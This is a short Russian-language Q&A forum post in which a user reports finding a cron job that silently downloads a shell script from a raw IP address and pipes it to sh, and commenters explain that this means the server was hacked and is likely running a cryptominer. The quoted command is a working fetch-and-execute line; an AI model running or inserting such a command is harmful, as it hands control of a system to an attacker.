# Нашел в Кроне такой процесс wget -q -O - http://83.220.169.247/cr2.sh | sh > /dev/null 2>&1 Что он делает?

Tags: cron

Нашел в Кроне такой процесс wget -q -O - http://83.220.169.247/cr2.sh | sh > /dev/null 2>&1 Что он делает? После его отключения сайт стал работать быстрее?

Comment: получает с указанного сайта произвольные команды и тут же их выполняет. Так что вас взломали.

Comment: Запускает на вашей системе какой-то криптомайнер.